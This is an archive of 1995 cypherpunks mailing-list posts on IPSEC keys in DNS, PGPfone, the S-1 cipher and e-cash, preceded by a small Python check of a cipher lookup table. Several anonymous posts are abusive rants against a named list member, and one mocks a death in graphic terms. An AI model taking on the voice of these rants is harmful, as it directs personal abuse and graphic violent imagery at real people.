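The kind of check behind the observation above, as an added example (not from the original post or the S-1 source): given a 256-entry one-bit lookup table, find which input bits affect the output and whether the table is just the parity of a masked input. `G1_TABLE` is constructed from the equivalence stated in the post, parity(i&0x17), since the actual table is not reproduced here; the function names are hypothetical.

```python
def parity(x):
    """Return 1 if x has an odd number of set bits, else 0."""
    return bin(x).count("1") & 1

def influential_bits(table, width=8):
    """Bit positions whose flip changes the output for at least one input."""
    size = 1 << width
    return [bit for bit in range(width)
            if any(table[i] != table[i ^ (1 << bit)] for i in range(size))]

def find_parity_mask(table, width=8):
    """Return (mask, const) if table[i] == parity(i & mask) ^ const for every
    input i, or None when the table is not an affine function of its input."""
    size = 1 << width
    for mask in range(size):
        for const in (0, 1):
            if all(table[i] == parity(i & mask) ^ const for i in range(size)):
                return mask, const
    return None

# Constructed table: derived from the equivalence stated in the post,
# not copied from the posted cipher source.
G1_TABLE = [parity(i & 0x17) for i in range(256)]

# Constructed contrast case: AND of the two low bits is not a parity function.
AND_TABLE = [(i & 1) & ((i >> 1) & 1) for i in range(256)]

if __name__ == "__main__":
    print("bits G1 depends on:", influential_bits(G1_TABLE))
    print("parity mask for G1:", find_parity_mask(G1_TABLE))
    print("parity mask for AND:", find_parity_mask(AND_TABLE))
```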




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Thu, 10 Aug 95 20:53:41 PDT
To: cypherpunks@toad.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <9508110355.AA08727@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain




	Hell hath no fury like a martyr scorned. . . 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 10 Aug 95 18:00:52 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <199508102337.BAA14035@utopia.hacktic.nl>
Message-ID: <9508110100.AA10650@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Well, for the record, _I_ certainly appreciate .pm's efforts on many fronts
related to cypherpunks.

Anonymous rants:
> I know you personally Perry, 

I doubt it. Prove it to me in *private* email.

-L. "Futplex" McCarthy   [PGP key available via finger or server]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SysAdmin <admin@dcwill.com>
Date: Thu, 10 Aug 95 21:18:18 PDT
To: cypherpunks@toad.com
Subject: Crypto-relevant flame interruption
Message-ID: <199508110418.VAA07616@python.ee.unr.edu>
MIME-Version: 1.0
Content-Type: text/plain



Would someone be so kind as to provide a status report on the
planned SSL attack? Last word was that codework was still underway,
but I might have missed something relevant to this project amidst
all of the noise about excessive list noise. 

Fred  <admin@dcwill.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 10 Aug 95 13:28:13 PDT
To: Derek Atkins <warlord@ATHENA.MIT.EDU>
Subject: Re: PGP Tools on Linux
In-Reply-To: <199508101842.OAA22544@charon.MIT.EDU>
Message-ID: <Pine.3.89.9508102143.A22057-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 10 Aug 1995, Derek Atkins wrote:

> Yea, I did a long time ago.  There was a bug in the code that caused
> destroying fifos to do this -- it would free the fifo and then try to
> set it, or something like that.  You have to reorder a few commands to
> fix the problem.

No, it's not that one, I'm afraid - this version works fine on SunOS and 
has that fix in it... it just won't work on Linux.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Thu, 10 Aug 95 20:34:59 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02130500ac507dd9a872@[199.117.100.2]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>BTW, he has been beat by Nautilus, right? Nautilus
>is public domain, right? (I'm thinking of that public
>domain voice encryption released a few mos ago).
>I wonder if he is going to try to put a "spin" on this
>one to differentiate it from the other one. on the
>other hand, just having his name on it is plenty of
>"spin"...

When I originally volunteered to help with coding on the PGP voice stuff,
the author (I think) of Nautilus sent me, and the rest of the PGP voice
mailing list participants, version 0.2 for review.  The initial plan was
to take the Nautilus code, rewrite it in a more modular fashion, and add
encryption to create voice PGP.  However, the incarnation of the PGP voice
mailing list we were using for the project just died, and I heard nothing
more about Nautilus after I submitted my comments and suggestions -- until
the release of Nautilus 0.9.

So if Nautilus code was not used in PGPfone, I suspect licensing or other
such issues got in the way, and Will Price and crew started from a
different base. Then again, perhaps Nautilus and PGPfone have much in
common.  We'll have to wait for the PGPfone release for the answer.


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCrPhfobez3wRbTBAQHM8AP6AjrIg3j2FjRW1vXSLJQ201cTbOic9Tms
3e6TtCdKu4m9OfOyJDIa+RuW+gRIpF8uBmhDAT8d50rhWa9RdEqAgxRSS6mLtzho
ExxjSaX3JPdbZjW5G6kMamN9czMFd1hfkxfBMTMVLFdnYzUhG/MQZCyJzLHqcy0c
idV9OPHTrck=
=bGwv
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Thu, 10 Aug 95 18:56:33 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508101452.KAA24637@panix4.panix.com>
Message-ID: <m0sgj9W-000wP1C@myriad>
MIME-Version: 1.0
Content-Type: text/plain


sdw@lig.net (Stephen D. Williams) wrote:

> I really like the idea of using DNS for (public I assume) keys...

I don't.

Public keys in the DNS is a bad idea because it makes it difficult to
update the database, especially in large organizations.  When a host's
key is issued or changed then they would have to get the nameserver
admin to change it for them.  This could become a major problem/
inconvenience for many, many people.  The host should be able to give
its own key in response to a query.  That key could, of course, be
signed by any number of trusted signators to guarantee authenticity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 10 Aug 95 18:52:57 PDT
To: cypherpunks@toad.com
Subject: Re: "Protect the children" as passphrase to Constitution
Message-ID: <199508110150.VAA26775@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Every time I hear some porker say, "Protect the children," the BS
translator that resides in my brain replaces the word "Protect"
with the words, "Treat adults like." Probably a mental defect.
JMR
PS
RIP Jerry G.  Let's cease the flamewar for 24 hours, in memory.


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCq1/m1lp8bpvW01AQGg8gQAiq+kzyQopCLFQtzPhr4WIN42I41ZDPyh
1qH1/DBHAS8BaNqK8f9jObEvG4a5dlpbzp5c0FdJ2cbcZtG/GZIG3clUPNd0cqtf
hR1abL8pTgoj7WMclOMF6iclzRn/fcHY9VawZHT10At3I11eyjOq3hBsfIU1c1IG
9pjlPeEW/IE=
=Ci1C
- -----END PGP SIGNATURE-----
Regards, Jim Ray

PGPsign all your cleartext messages! [Makes the statists nervous.]
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCq3ESoZzwIn1bdtAQGfFQF9FL9ptx5QVfg6nGL+NePHg6cuq3B2fa/U
9Ir2SmI6NZQPgjvFtCPO9ZmepaLBkEqs
=+nDm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 10 Aug 95 20:50:49 PDT
To: perry@piermont.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <199508110337.XAA15986@panix2.panix.com>
Message-ID: <Pine.ULT.3.91.950810224841.16955A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 10 Aug 1995, Perry E. Metzger wrote:

> I was under the impression Detweiler was legally obligated not to post
> to this mailing list.

Maybe it's just me, but I guess I find the occasional rants and such to 
be a light-hearted relief from the more serious name-calling and ranting 
:-) 

Of course, anything I see posted anonymous (or emailed to me anonymously, 
except by such services as penet.fi or PGP signed) isn't taken with any 
seriousness at all.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMCq3pDokqlyVGmCFAQHg4wQAiXFo/rAgKFebLI92H/ILMTH3Og1LAzmD
uIQo2Dda+oXadFVva6s8OC1dkV+sJQjXFYOWrSZ4G91N0fwtsMRfKeTkv7XigxIA
sQhjC1zWtgqgGQTohhhEanMz64I/g0r/3BQyiKG+Pq18dmG07yxgQouP3wSTmgXZ
oBDVGyumt6A=
=OGNs
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 20:36:15 PDT
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199508102329.SAA21100@bsu-cs.bsu.edu>
Message-ID: <199508110336.XAA12412@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



With friends like, er, our old friend here, who needs enemies?

Anonymous writes:
> will someone just CUT THE @#$%^&* FOSTER CONSPIRACY THEORIES??
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 20:37:59 PDT
To: cypherpunks@toad.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <199508102337.BAA14035@utopia.hacktic.nl>
Message-ID: <199508110337.XAA15986@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> I'm tired of Perry. he's always ranting and stirring the shit.

I was under the impression Detweiler was legally obligated not to post
to this mailing list.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 20:49:29 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <m0sgj9W-000wP1C@myriad>
Message-ID: <199508110349.XAA08572@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew Ghio writes:
> sdw@lig.net (Stephen D. Williams) wrote:
> 
> > I really like the idea of using DNS for (public I assume) keys...
> 
> I don't.
> 
> Public keys in the DNS is a bad idea because it makes it difficult to
> update the database, especially in large organizations.

That's one of a number of reasons why the DNS dynamic update facility
has been created.

> The host should be able to give
> its own key in response to a query.

What makes you assume we are using hosts as the keyed endpoints in the
usual case? Users are also getting keys, and querying them will be
difficult until humans all come equipped with implanted radio
transmitters. See "The President's Analyst" for a possible solution to
that problem, but I prefer DNS :-)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 20:54:24 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <Pine.3.89.9508110008.D1336-0100000@shaq.midex.com>
Message-ID: <199508110354.XAA09825@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



There seem to be a bunch of people interested in helping with a Linux
version of IPSEC. If you guys could spontaneously self-organize it
might help -- I unfortunately am not in a good position to do it for
you :-)

Having a Linux version would be extremely key -- I'm very glad to see
the enthusiasm for it.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Thu, 10 Aug 95 20:58:52 PDT
To: cypherpunks@toad.com
Subject: Re: More "S-1" foolishness (fwd)
Message-ID: <Pine.3.89.9508102352.A620929653-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


How about this?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm

---------- Forwarded message ----------
Date: Thu, 10 Aug 1995 23:34:42 -0400 (EDT) 
From: Dorothy Denning <denning@cs.cosc.georgetown.edu>
To: mfroomki@umiami.ir.miami.edu
Cc: denning@cs.cosc.georgetown.edu
Subject: Re: More "S-1" foolishness (fwd) 

Thanks for sending all this stuff.  The algorithm is definitely
not Skipjack.  Feel free to pass this along if you'd like.

Cheers,
Dorothy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Thu, 10 Aug 95 16:02:07 PDT
To: turner@telecheck.com
Subject: Re: Bank Fees and E-Cash
In-Reply-To: <9508100004.AA03734@TeleCheck.com>
Message-ID: <Pine.3.89.9508110043.A1336-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Aug 1995 turner@telecheck.com wrote:

> Citibank and MasterCard are developing an "internet" ways for you to use 
> your credit cards, not e-cash.  Microsoft is developing ways to pipe that
> information to them.  These are not going to solve the problem, especially
> at 18.9% A.P.R...

Can somebody give us an update as to how this is going?  I would like 
strong, real, digital cash, but until then, some of us could utilize this 
at the very least.  

Updates or pointers?...  

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@wwa.com>
Date: Thu, 10 Aug 95 22:14:00 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <m0sgj9W-000wP1C@myriad>
Message-ID: <Pine.BSD.3.91.950811001051.1066E-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Matthew Ghio wrote:

> sdw@lig.net (Stephen D. Williams) wrote:
> 
> > I really like the idea of using DNS for (public I assume) keys...
> 
> I don't.
> 
> Public keys in the DNS is a bad idea because it makes it difficult to
> update the database, especially in large organizations.  When a host's
> key is issued or changed then they would have to get the nameserver
> admin to change it for them.  This could become a major problem/
> inconvenience for many, many people.  The host should be able to give
> its own key in response to a query.  That key could, of course, be
> signed by any number of trusted signators to guarentee authenticity.
>
There are some other problems too I believe.  I have worked for a decent 
sized network who did all user authentication at the terminal servers for 
dial-in accounts thru DNS.  This wasn't too bad for just passwords and 
stuff, but wouldn't this cause some bloat in the nameserver's database?  
As well as cause problems security wise when it comes to updates.  Would 
these automatically not be cached in any form by the site making the 
request?  This also causes a problem for smaller time people who perhaps 
have a PPP/SLIP connection 24/7 but have name service done by their provider, 
and I for sure don't want my provider to be in control of those keys. 
 

Nesta Stubbs		  "under the streamlined chrome shell, you'd 
Cynico Network Consulting   find the same victorian mechanism." WG
nesta@wwa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Thu, 10 Aug 95 16:42:29 PDT
To: David Neal <dneal@usis.com>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <Pine.BSI.3.91.950810134314.7478B-100000@usis.com>
Message-ID: <Pine.3.89.9508110008.D1336-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be involved with any final stages of the Linux port.  I 
run a now fairly defunct business off of my Linux Box and can afford 
some troubles in alpha testing.  Let me know when things are near a 
testing stage guys.

Oh, and by the way, thanks for doing this everyone.  It is VERY important!

Matt

On Thu, 10 Aug 1995, David Neal wrote:

> I'd like to also volunteer to do the linux port, whether it be
> coordination patches, hacking code, finding people, whatever.
> 
> 

> David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
> Unix, Sybase and Networking consultant. "...you have a personal responsibility 
> to be pro-active in the defense of your own civil liberties." - S. McCandlish
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 11 Aug 95 01:16:57 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Protect the children" as passphrase to Constitution
Message-ID: <199508110813.BAA25692@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 PM 8/10/95 -0700, Tim wrote:
>- Clinton's Executive Order today which limits advertising of cigarettes,
....
>(Oh, and one amazing detail: the possible issuance of I.D. cards to all of
>those under the age of 18. Besides being useful for things like curfews,

What!?!?!?!  I guess I'm not totally surprised - registration of all children
has been high on Clinton's agenda ever since he's been in the White House.
One of the more blatant examples was the child vaccination proposals - which
first started out as "take over the vaccination system and register all kids
so we can remind their parents to get their shots", and gradually included 
less and less control and funding of vaccination while retaining the
registration.
Sigh.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 11 Aug 95 01:17:08 PDT
To: trei@process.com
Subject: Re: "S1" encryption system (was: this looked like it might
Message-ID: <199508110814.BAA25707@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:13 AM 8/10/95 -6, you wrote:

As with Peter and Nathan, I'm also a former tool of the military-industrial
complex (:-), and Peter's right that the probable source of this assertion
is that there's seldom any "vanilla" TOP SECRET data - anything that's sensitive
enough to get TOP SECRET handling rules is usually part of some compartmented
project (compartmentalization is a formalized version of Need to Know,
where you need to be read into PROJECT X to get PROJECT X data.)
Sensitive Compartmented Information is one well-known class of stuff.
Codeword projects are identified by words picked off a list of
content-free names; some codewords that have been outed in the past are
ULTRA and UMBER.

In addition to project-specific classifications, some of the kinds of labels
on material include variants on INTEL, CNWDI (Critical Nuclear Weapons Design
Information), RESTRICTED DATA (less critical nuclear weapons data), FORMERLY
RESTRICTED DATA (a weird classification for material that isn't RESTRICTED
DATA any more but they still don't want to let folks see.)

And then there's the sort of data that's SECRET by the time the people doing
the grunt-work see it, but it's various extracts of REALLY SPOOKY DATA,
that only a few people back in some agency know the whole picture,
and it's parcelled out so one group of people gets asked to build a
laser-scanner like this, and another gets asked to build a computer system
like that, or a mirror adjuster like that, and none of the grunts know
whether the whole deal is personal teleportation system (the cover project)
or a space-based assassination system, much less how they decided on the
targets....

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 10 Aug 95 22:31:05 PDT
To: cypherpunks@toad.com
Subject: Clinton to resign?
Message-ID: <Pine.SOL.3.91.950811012207.19227A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain



Associated Press reported on August 10, 1995:
 
President Won't Resign But...

(WASHINGTON)

President Clinton wasn't about to give a serious 
answer when he was asked Thursday if he might resign. 

The question came from veteran columnist Sarah McClendon, who asserted 
that some legislators from the left and right were trying to push him 
out of office.

[...]

"Well, if you promise to run off with me I might," Clinton responded,
... "But otherwise, I can't think of any reason." 

- - - - - - - - - -

Repeat after me:

There's nothing to those crazy conspiracy theories.
There's nothing to those crazy conspiracy theories.....







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Thu, 10 Aug 95 16:29:33 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0sgh1i-00029BC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


perry, of course, is a dysfunctional human "cipher" himself,
who couldn't be civil if he was at a tea party of grandmothers.
yes, in 15 minutes he would end up screaming and
 mooning them all because they hadn't heard of Netscape or Chaum or something. 
what a prick. so he wants to lobby congress and write some code??
well perry, good for you. you just go off on your little
excursion. let us know how you are doing. send some postcards
to Blacknet, OK???

as for TCM and his invest-in-stocks-and-evade-taxes shtick, it's
starting to bore me too. frankly I think that both TCM and
PM should take a long, long vacation from the cypherpunks list
and go take a cruise together. yes, help patch up that relationship
that is so strained lately. it hurts us all to see two grown
men fighting each other. make love, not war!!! hehehehe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 10 Aug 95 16:37:38 PDT
To: cypherpunks@toad.com
Subject: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <199508102337.BAA14035@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I'm tired of Perry. he's always ranting and stirring the shit.
he's always setting himself up as the savior of the list
signal. what the hell has he really written? oh, the poor
bastard has holed himself in his apartment to write 
crypto code or the world is going to die tomorrow. 

thank you, mr. Jesus Christ, Nailed to a Cybercross.

 WHY HATH WE FORSAKEN HIM??? oh, I can
see the blood oozing from the gaping flesh wounds. poor
Perry, having to bear this horrible cross while everyone
else stands around and gawks and remarks about Foster 
conspiracy theories... yes, we are being utterly inconsiderate
of his splendor and selflessness. has anyone seen
Mathew, Mark, John, or Luke around??? Perry has something
to say to them.

oh, and Perry has become Mr. Cyberlobbyist. yes, just
what we NEED, is another person to be sucked up and
ground up in the oozing washington slime regurgitator.
well, if it would swallow him up and never spit him
out, perhaps we should encourage him in his newfound
political passions.

I have seen an awful lot of noise on the
list, and I'm pretty f***ing amazed at how much of it
is due to PM and his BLACKBOARD FINGERNAIL SCREECHING.
he's worse than detweiler. actually, I think he may be a 
detweiler tentacle.  he's certainly doing a fantastic
impression of it.  mr. holier than thou Protector of the
Cypherpunks. 

perry, just go stay in your dark apartment and write your
code. we'll be happy to hear from you in a year when you
have all your little tinkertoy prototypes put together with
threads and bubblegum.  

TCM is not the first person you have violated by posting
private mail. you are the lowest cypherscum for violating
privacy, perry. you know that if anything is sacred
to cypherpunks, it is Tim May and privacy, and frankly
I think you have been doing just a little too much pissing
on both of them lately. oh, violate Tim May's privacy?
well, stab two sacred cows with one bazooka, why don't
you, you little bastard... do we have any need for you?
maybe tim may is a weenie, but I'd rather have a weenie
around than YOU, and I think virtually EVERYONE HERE
concurs on that point... why don't you take a vacation from
the list? TCM has the guts to do this, and has done so
in the past. but you are just a bloated buffoon who
cannot tell when he is not wanted somewhere even as
people spit in your face.  hee, hee, reminds me of
someone else I know.

but frankly, perry, I don't think you have the balls to 
go away. if you are a real programmer, and all the real programmers
have left, what does that make you? stupid, I'd say. we would
not miss you one whit if you left, Perry. in fact I think
it's safe to say that we'd be quite delighted if you would
take your constant shit-stirring somewhere else and get
a life. TCM may have a pathetic excuse for a hobby,
but you have a pathetic excuse for a LIFE. I know you
personally Perry, and you couldn't conduct yourself in
a meeting of civilized people if you had your tongue 
chopped off, and I think there's plenty of meetings you've
been to when your peers were wishing exactly that....


xxxxxxooooo <- hugs and kisses, darling perry puppy








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 10 Aug 95 16:45:13 PDT
To: cypherpunks@toad.com
Subject: F*** FOSTER
Message-ID: <199508102345.BAA14099@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


this vince foster thing is BS. total bs. Perry is right.
there's not a single smidgeon of honest reporting going
on. it's just slime being stirred up by internet thugs
and rapscallions. let foster rest in peace. multiple
people have ruled it was a suicide. perry can attest
that it was a suicide. perry can attest that the NSA
was not involved. he has seen everything, and if he has
an opinion on something, you can take his word that it
was based on the FACTS. the FACTS of the case are that
FOSTER was fed up with his nothing life, and pulled
the trigger and blew his brains out in a park. so what
if they couldn't find the brains anywhere? or they
are missing a few here and there??? they were 
splattered on the grass. when there is that much splatter
all over the place, you can be sure that the people
showing up with the spatula are not going to be that
meticulous. they probably did about 5 minutes of 
scrape, scrape, scraping and then vomited and passed
the spatula to the next guy. I mean, cut these guys
some slack.

the NSA stuff is total, utter poppycock. the NSA has
absolutely nothing to do with vince foster. Clinton
has nothing to do with foster. Hillary has nothing
to do with foster. why, the way people are ranting you'd
think there is a major political scandal going on.
NOTHING IS GOING ON HERE. please step aside, and move
along. PLEASE MOVE ALONG FOLKS, THERE'S NOTHING MORE TO
SEE HERE.

the fact that foster may have had access to intelligence
secrets such as cryptography is IRRELEVANT to the
cypherpunks. the fact that a scandal may have taken place
is IMMATERIAL  to our goals. our goals are to WRITE
CODE. FOR GOD'S SAKE, WRITE THAT CODE. I don't care if
you have to create code generators. CODE, CODE, CODE.
post the code to the cypherpunks list. talk about the
code. critique the code. study the code. salvation for
all humanity lies in finding the magic formula. and we
can't find it, UNLESS WE CODE, DAMMIT. perry understands
this. some people think that there is a magic government
program that will solve poverty, give freedom to everyone
in the US, and solve P=NP. they're WRONG. the government
cannot do any of this. BUT PROGRAMMERS CAN!!!!

put your programming hats on. if you haven't banged a 
keyboard a half million times, fired up VI to edit a
C file for the ten zillionth time, NO PROGRESS IS BEING
MADE. IT'S AS SIMPLE AS THAT. if you haven't compiled 
something recently, RECOMPILE IT JUST TO BE SAFE. we
just aren't making any progress without CODE, CODE, CODE.
we have an utter shortage of code. the problem is not
politics, but LACK OF CODE. anyone can look at the net
today and see there is a HORRENDOUS SHORTAGE OF CODE
IN CYBERSPACE. we have to train everyone to program 
NOW or the future is lost to the incompetent. we will
be back to Vic 64's if people don't keep up the constant
programming. software is the key to salvation. 

every second devoted to the vince foster thing is a
precious second taken away from code. NOTHING POSITIVE
CAN COME OF PREOCCUPATION WITH CONSPIRACY THEORIES.
PERRY CAN ATTEST TO THAT. remember when PRZ was getting
indicted? perry was right on then too. some people were
scared shitless and raving out of their minds, saying the
world would end tomorrow, but NOT PERRY. perry has NO
FEAR. he said that we should CODE, CODE, CODE. and you
know what??? HE'S RIGHT. if people followed PERRY, we
would not be in this @#$%^&* predicament we are in.
if we could just get it so that every person who signed
up to the internet could CODE, we would be home free.
salvation. utopia!!! then we could rest a little. but
only a little, otherwise the NSA will beat us again
at the code race.

once again: forget Foster. nothing, absolutely nothing
about this scandal could possibly help our cause of
trying to expose corruption in government to the 
mainstream populace, to keep them better informed, to
put limits on the NSA, to show that they have been
involved in horrendous abuses, that there is something
utterly smelly in our government. FORGET IT. NOTHING
LIKE THIS WILL EVER BE PROVEN OR ESTABLISHED. IT'S
IMPOSSIBLE, JUST LIKE PERRY SAYS SO.

when anything new comes of this foster stuff, just remember
that perry predicted way ahead of time that it would amount
to NOTHING, NOTHING, NOTHING. and the more you preoccupy
your brains with this TOTAL MINUTIA, the less you are coding.
STOP IT RIGHT NOW. just remember, if you don't, you will
be SORRY, and when you come crying back to Perry that nothing
of value came of all your conspiracy mongering, he will
have NO SYMPATHY, in fact if he had a gun around he'd 
probably be tempted to blow your brains out. and you
can just FORGET about the spatula.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 11 Aug 95 02:14:55 PDT
To: cypherpunks@toad.com
Subject: Re: More "S-1" foolishness
In-Reply-To: <199508110353.UAA04743@jobe.shell.portal.com>
Message-ID: <199508110914.CAA11614@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Hal <hfinney@shell.portal.com> writes:
> It is possible I suppose that the F and G boxes are not the ones used
> in the "real" version of whatever cipher this is, so this apparent
> weakness and the ones which Matt has pointed out may not be that
> significant.

To the extent that one can believe the comments, it's more than "possible":
they say that the F and G boxes differ in the S-2 version.  One reason for
doing it this way might be to isolate the sensitive actual values from
people doing analysis or development at a grosser level.  That doesn't
explain the [r] bug you spotted, of course.

	Jim Gillogly
	Sterday, 19 Wedmath S.R. 1995, 09:12




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 10 Aug 95 23:18:41 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Key escrow granularity (Was: If only Vxxxx Fxxxxx had used encryption)
In-Reply-To: <8AEE4DC.0003000301.uuout@famend.com>
Message-ID: <9508110618.AA16373@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Monty Harder writes:
> The details of the protocol(s) can be worked out after the basic premise:
> 
